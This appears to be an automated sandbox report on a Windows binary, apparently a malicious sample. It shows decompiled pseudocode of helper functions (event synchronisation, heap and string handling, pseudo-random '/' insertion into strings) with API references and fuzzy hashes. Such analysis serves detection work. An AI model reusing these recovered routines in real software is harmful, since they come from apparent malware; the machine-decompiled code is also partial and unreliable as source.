WaitForSingleObject.KERNEL32(00000000), ref: 00F94720
GetLastError.KERNEL32 ref: 00F94740

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 038ae2b9684800c11e879fda774528bd10baa9e2846a1d25521b489d45a1d358
Instruction ID: 314caee3402a612e533c82411d58f72953a0c09a8b9eccc40f2ff3bda112d1a6
Opcode Fuzzy Hash: 038ae2b9684800c11e879fda774528bd10baa9e2846a1d25521b489d45a1d358
Instruction Fuzzy Hash: 3D411AB5D0120DEFEF20DFE4C9889AEBBB9FB15344F21446AE501E6150D770AE41EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F94CD5, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00F94CD5(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xf9a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xf9a2d0; // 0x310d5a8
				_t3 = _t8 + 0xf9b84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E00F91970(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xf9a2d4, 1, 0, _t30);
					E00F92A03(_t30);
				}
				_t12 =  *0xf9a2b4; // 0x2000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E00F919E7() == 0) {
						_t28 =  *0xf9a124( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E00F963CD(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E00F97836(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x00f94cd6
0x00f94cdd
0x00f94ce7
0x00f94ceb
0x00f94cf1
0x00f94cfe
0x00f94d05
0x00f94d09
0x00f94d1b
0x00f94d1d
0x00f94d1d
0x00f94d22
0x00f94d29
0x00f94d34
0x00f94d4a
0x00f94d4e
0x00f94d50
0x00f94d55
0x00f94d55
0x00f94d62
0x00f94d66
0x00f94d6a
0x00000000
0x00000000
0x00f94d78
0x00f94d7c
0x00000000
0x00000000
0x00f94d7c
0x00f94d66
0x00000000
0x00f94d7e
0x00f94d7e
0x00f94d7e
0x00f94d84
0x00f94d86
0x00f94d86
0x00f94d90
0x00f94d94
0x00f94da6
0x00f94da6
0x00f94daa
0x00f94db0
0x00f94db0
0x00f94db3
0x00f94db5
0x00f94db8
0x00f94db8
0x00f94dbf
0x00f94dc5
0x00f94dc5

APIs

Part of subcall function 00F91970: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,7691C740,00F93EC5,74666F53,00000000,?,00000000,?,?,00F92F4F), ref: 00F919A6
Part of subcall function 00F91970: lstrcpy.KERNEL32(00000000,00000000), ref: 00F919CA
Part of subcall function 00F91970: lstrcat.KERNEL32(00000000,00000000), ref: 00F919D2

CreateEventA.KERNEL32(00F9A2D4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00F97338,?,?,?), ref: 00F94D14

Part of subcall function 00F92A03: RtlFreeHeap.NTDLL(00000000,00000000,00F94072,00000000,?,?,00000000,?,?,?,?,?,?,00F944AE,00000000), ref: 00F92A0F

WaitForSingleObject.KERNEL32(00000000,00004E20,00F97338,00000000,?,00000000,?,00F97338,?,?,?,?,?,?,?,00F91C40), ref: 00F94D72
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00F97338,?,?,?), ref: 00F94DA0
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00F97338,?,?,?), ref: 00F94DB8

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: b71b8cb0fb126b7df8147713d7a1266b38a58014be8e6b45a0f8047475afaf3e
Instruction ID: fe8bdf2c5b29c810fab4a150c35d573ee01eef8db053e01b83fa86ce3df5de04
Opcode Fuzzy Hash: b71b8cb0fb126b7df8147713d7a1266b38a58014be8e6b45a0f8047475afaf3e
Instruction Fuzzy Hash: C0210536E007265BFF214BB89C44F5B72D8AF68720F050227FD5197250DB75EC02A790

Uniqueness

Uniqueness Score: -1.00%

Function 00F97289, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00F97289(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00F92616(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00F928B8(_t23);
						}
					}
					return _t38;
				}
				if(E00F94380(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xf9a2d4, 1, 0,  *0xf9a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00F97360(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00F9202E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00F93EFA(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00F94CD5( &_v32, _t39);
					goto L13;
				}
			}

0x00f97289
0x00f97296
0x00f9729c
0x00f9729d
0x00f9729e
0x00f9729f
0x00f972a0
0x00f972a4
0x00f972b0
0x00f972b4
0x00f9733c
0x00f9733c
0x00f9733f
0x00f97341
0x00f97349
0x00f9734f
0x00f97352
0x00f97352
0x00f9734f
0x00f9735d
0x00f9735d
0x00f972c7
0x00f972c9
0x00f972c9
0x00f972e0
0x00f972e4
0x00f972e7
0x00f972f2
0x00f972f9
0x00f972f9
0x00f97305
0x00f97306
0x00f97314
0x00f97308
0x00f97308
0x00f97309
0x00f9730a
0x00f9730b
0x00f9730c
0x00f9730d
0x00f9730d
0x00f97319
0x00f9731e
0x00f97320
0x00f97322
0x00f97322
0x00f97329
0x00000000
0x00f9732b
0x00f9732b
0x00f97338
0x00000000
0x00f97338

APIs

CreateEventA.KERNEL32(00F9A2D4,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730,?,?,?,?,00F91C40,?,00000001), ref: 00F972DA
SetEvent.KERNEL32(00000000,?,?,?,?,00F91C40,?,00000001,00F92F7D,00000002,?,?,00F92F7D), ref: 00F972E7
Sleep.KERNEL32(00000BB8,?,?,?,?,00F91C40,?,00000001,00F92F7D,00000002,?,?,00F92F7D), ref: 00F972F2
CloseHandle.KERNEL32(00000000,?,?,?,?,00F91C40,?,00000001,00F92F7D,00000002,?,?,00F92F7D), ref: 00F972F9

Part of subcall function 00F97360: WaitForSingleObject.KERNEL32(00000000,?,?,?,00F97319,?,00F97319,?,?,?,?,?,00F97319,?), ref: 00F9743A
Part of subcall function 00F97360: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00F97319,?,?,?,?,?,00F91C40,?), ref: 00F97462

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 6ec80cf98c893174c499057e22787cdf177b3cf3269b488403f4736e4c72516b
Instruction ID: de679e3cf6b0a2adf8a644c4ae22c68e6bc0e968668ad40b992a127828963747
Opcode Fuzzy Hash: 6ec80cf98c893174c499057e22787cdf177b3cf3269b488403f4736e4c72516b
Instruction Fuzzy Hash: 7C21C533D14319ABEF20BFF48C81D9E77B9AB44320B454429FA15A7140D775DD01BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F94138, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00F94138(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xf9a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xf9a2a8; // 0x1315c8d5
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xf9a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00f94140
0x00f94143
0x00f94149
0x00f94161
0x00f94165
0x00f94168
0x00f9416a
0x00f9416d
0x00f9416f
0x00f94172
0x00f94174
0x00f94174
0x00f94176
0x00f94181
0x00f94186
0x00f94197
0x00f9419f
0x00f941a4
0x00f941a7
0x00f941aa
0x00f941ac
0x00f941b2
0x00f941b5
0x00f941b5
0x00f941b5
0x00f941c0
0x00f941c5
0x00f941cf

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00F95B76,00000000,?,00000000,00F96301,00000000,040A9630), ref: 00F94143
RtlAllocateHeap.NTDLL(00000000,?), ref: 00F9415B
memcpy.NTDLL(00000000,040A9630,-00000008,?,?,?,00F95B76,00000000,?,00000000,00F96301,00000000,040A9630), ref: 00F9419F
memcpy.NTDLL(00000001,040A9630,00000001,00F96301,00000000,040A9630), ref: 00F941C0

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: ad36d1a3ea5fb72f2df2b81f992b8778f0a2c45e546bc911680b9fe5b9f54a7b
Instruction ID: 6a3721bc191dccd213ea22641b58f5d9adcccdcac3bcd33d521be515ab18c697
Opcode Fuzzy Hash: ad36d1a3ea5fb72f2df2b81f992b8778f0a2c45e546bc911680b9fe5b9f54a7b
Instruction Fuzzy Hash: A0110672A00118BFD711CB69DC85D9EBBBEEB94360B150166F504D7160E6709E44A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F949BA, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F949BA(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00F95C4E(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xf992c4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xf992c4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00f949c5
0x00f949c9
0x00f949cb
0x00f949cc
0x00f949d4
0x00f949d4
0x00f949d8
0x00000000
0x00000000
0x00f949cf
0x00f949d0
0x00f949d3
0x00f949d3
0x00f949e0
0x00f949e7
0x00f949eb
0x00f949f3
0x00f949f9
0x00f949fb
0x00f94a00
0x00f94a04
0x00f94a06
0x00f94a09
0x00f94a10
0x00f94a10
0x00f94a1a
0x00f94a1d
0x00f94a20
0x00f94a20
0x00f94a2c
0x00f94a2c
0x00f94a39

APIs

StrChrA.SHLWAPI(?,00000020,00000000,040A962C,?,?,?,00F96072,040A962C,?,?,00F92F44), ref: 00F949D4
StrTrimA.SHLWAPI(?,00F992C4,00000002,?,?,?,00F96072,040A962C,?,?,00F92F44), ref: 00F949F3
StrChrA.SHLWAPI(?,00000020,?,?,?,00F96072,040A962C,?,?,00F92F44,?,?,?,?,?,00F944F9), ref: 00F949FE
StrTrimA.SHLWAPI(00000001,00F992C4,?,?,?,00F96072,040A962C,?,?,00F92F44,?,?,?,?,?,00F944F9), ref: 00F94A10

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 00999f92c16ec90ebf76d582e27f7939aa69c8b812907cbdeeca9288325fa353
Instruction ID: 3978dcf2b62194d0f64b02009a4788c48ffefc7527b03c3621cc10cd327bb7b6
Opcode Fuzzy Hash: 00999f92c16ec90ebf76d582e27f7939aa69c8b812907cbdeeca9288325fa353
Instruction Fuzzy Hash: FE012D71A443156FE731CF198C49F277E98EB5AB60F110509F481C7280E764DC02A6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F91970, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F91970(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00F9354E(_t8, _t1);
				_t16 = E00F95C4E(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00F9756E(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00F95C4E(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00F92A03(_t16);
				}
				return _t18;
			}

0x00f9197b
0x00f9197c
0x00f9197f
0x00f91981
0x00f9198c
0x00f91990
0x00f91995
0x00f91999
0x00f919a1
0x00f919a6
0x00f919ae
0x00f919ae
0x00f919b7
0x00f919bb
0x00f919c1
0x00f919c4
0x00f919ca
0x00f919ca
0x00f919d2
0x00f919d2
0x00f919d9
0x00f919d9
0x00f919e4

APIs

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

Part of subcall function 00F9756E: wsprintfA.USER32 ref: 00F975CA

lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,7691C740,00F93EC5,74666F53,00000000,?,00000000,?,?,00F92F4F), ref: 00F919A6
lstrcpy.KERNEL32(00000000,00000000), ref: 00F919CA
lstrcat.KERNEL32(00000000,00000000), ref: 00F919D2

Strings

Soft, xrefs: 00F9197C, 00F91995

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 19311271045278084f03b83bebbe7b46b4a6709be9825398f3c6a4100b2a5508
Instruction ID: 2fbd06809db8b8187bd56fcf784d0ef1046798691f137fcd303ac82f3a342985
Opcode Fuzzy Hash: 19311271045278084f03b83bebbe7b46b4a6709be9825398f3c6a4100b2a5508
Instruction Fuzzy Hash: C001F23260020EB7EF123B798C85AEF3A6CAF84754F064026F90455111DB788949E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F91547, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F91547() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xf9a2c4; // 0x284
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xf9a304; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xf9a2c4; // 0x284
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xf9a290; // 0x3cb0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00f91547
0x00f9154e
0x00f91598
0x00f9159a
0x00f9159a
0x00f91552
0x00f91558
0x00f9155d
0x00f91561
0x00f91567
0x00f9156e
0x00000000
0x00000000
0x00f91570
0x00f91575
0x00000000
0x00000000
0x00000000
0x00f91575
0x00f91577
0x00f9157f
0x00f91582
0x00f91582
0x00f91588
0x00f9158f
0x00f91592
0x00f91592
0x00000000

APIs

SetEvent.KERNEL32(00000284,00000001,00F94214), ref: 00F91552
SleepEx.KERNEL32(00000064,00000001), ref: 00F91561
CloseHandle.KERNEL32(00000284), ref: 00F91582
HeapDestroy.KERNEL32(03CB0000), ref: 00F91592

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: d3364c48e185a99ad77ecd76172943b8302b79bd2037b49ecc5fafb2f5b9a92f
Instruction ID: 0e9312951a0b902cf45869150a17b2a1de838a5b5874257789d88c152be5c846
Opcode Fuzzy Hash: d3364c48e185a99ad77ecd76172943b8302b79bd2037b49ecc5fafb2f5b9a92f
Instruction Fuzzy Hash: 2FF03031F0431A9BEB305B39AD0CB1A37ACBB5572170B0569B92AD31A0DB65C900B591

Uniqueness

Uniqueness Score: -1.00%

Function 00F95EC8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00F95EC8(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t21;
				void* _t23;
				void* _t24;
				signed short* _t25;

				_t23 = __edx;
				_t24 = E00F933FA(0, _a12);
				if(_t24 == 0) {
					_t21 = 8;
				} else {
					_t25 = _t24 + _a16 * 2;
					 *_t25 =  *_t25 & 0x00000000;
					_t21 = E00F91A6B(__ecx, _a4, _a8, _t24);
					if(_t21 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_push( &_v12);
						 *_t25 = 0x5f;
						_t21 = E00F95C15(_t23, 8, _a4, 0x80000001, _a8, _t24);
					}
					HeapFree( *0xf9a290, 0, _t24);
				}
				return _t21;
			}

0x00f95ec8
0x00f95edb
0x00f95edf
0x00f95f39
0x00f95ee1
0x00f95ee8
0x00f95eee
0x00f95ef7
0x00f95efb
0x00f95f01
0x00f95f0a
0x00f95f0f
0x00f95f24
0x00f95f24
0x00f95f2f
0x00f95f2f
0x00f95f40

APIs

Part of subcall function 00F933FA: lstrlen.KERNEL32(?,00F9A380,74E47FC0,00000000,00F92788,?,?,?,?,?,00F93EAC,?), ref: 00F93403
Part of subcall function 00F933FA: mbstowcs.NTDLL ref: 00F9342A
Part of subcall function 00F933FA: memset.NTDLL ref: 00F9343C

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,74E05520,00000000,00000008,00000014,004F0053,040A932C), ref: 00F95F01
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,74E05520,00000000,00000008,00000014,004F0053,040A932C), ref: 00F95F2F

Strings

Ut, xrefs: 00F95F2F

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Ut
API String ID: 1500278894-8415677
Opcode ID: 6d279516d430e3c360bb1e1e232532e66251e20ebad5f5673d24aee82187d8d9
Instruction ID: 18e7b0f3c0c11e109a5e22aee56e121bd392780f75b91e2042fc0ea0fbda5011
Opcode Fuzzy Hash: 6d279516d430e3c360bb1e1e232532e66251e20ebad5f5673d24aee82187d8d9
Instruction Fuzzy Hash: 0101D43261060EBBEF221FA89C45E8B7BB9FB84B14F004025FA009A051EB71D914EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F92FFC, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00F92FFC(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00F95C4E(_t2);
				if(_t34 != 0) {
					_t30 = E00F95C4E(_t28);
					if(_t30 == 0) {
						E00F92A03(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00F979AC(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00F979AC(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00f92ffc
0x00f93006
0x00f93008
0x00f9300e
0x00f9300e
0x00f93017
0x00f9301b
0x00f93027
0x00f9302b
0x00f9309f
0x00f9302d
0x00f9302d
0x00f93031
0x00f93038
0x00f9303b
0x00f93055
0x00f93044
0x00f93044
0x00f93048
0x00f9304b
0x00f93050
0x00f93050
0x00f9305a
0x00f93082
0x00f93088
0x00f9308b
0x00f9305c
0x00f9305e
0x00f93066
0x00f93071
0x00f93076
0x00f93076
0x00f93092
0x00f93099
0x00f9309a
0x00f9309a
0x00f9302b
0x00f930aa

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00F956E5,00000000,00000000,00000000,040A9698,?,?,00F93B82,?,040A9698), ref: 00F93008

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

Part of subcall function 00F979AC: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00F93036,00000000,00000001,00000001,?,?,00F956E5,00000000,00000000,00000000,040A9698), ref: 00F979BA
Part of subcall function 00F979AC: StrChrA.SHLWAPI(?,0000003F,?,?,00F956E5,00000000,00000000,00000000,040A9698,?,?,00F93B82,?,040A9698,0000EA60,?), ref: 00F979C4

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00F956E5,00000000,00000000,00000000,040A9698,?,?,00F93B82), ref: 00F93066
lstrcpy.KERNEL32(00000000,00000000), ref: 00F93076
lstrcpy.KERNEL32(00000000,00000000), ref: 00F93082

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 96890b8378da7e2401edade8bad66bc1bf9648576c6137f3beaffe24438783b9
Instruction ID: 5e5cb5bbc3071c6589f25f136f179b3fe5ee75610ab6902f2c29afce9aeb738b
Opcode Fuzzy Hash: 96890b8378da7e2401edade8bad66bc1bf9648576c6137f3beaffe24438783b9
Instruction Fuzzy Hash: 9321D232904219BFEF125F79CC44AAA7FB89F46394B054054F9059B226D775CA00E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F94DC8, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F94DC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00F95C4E(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00f94ddd
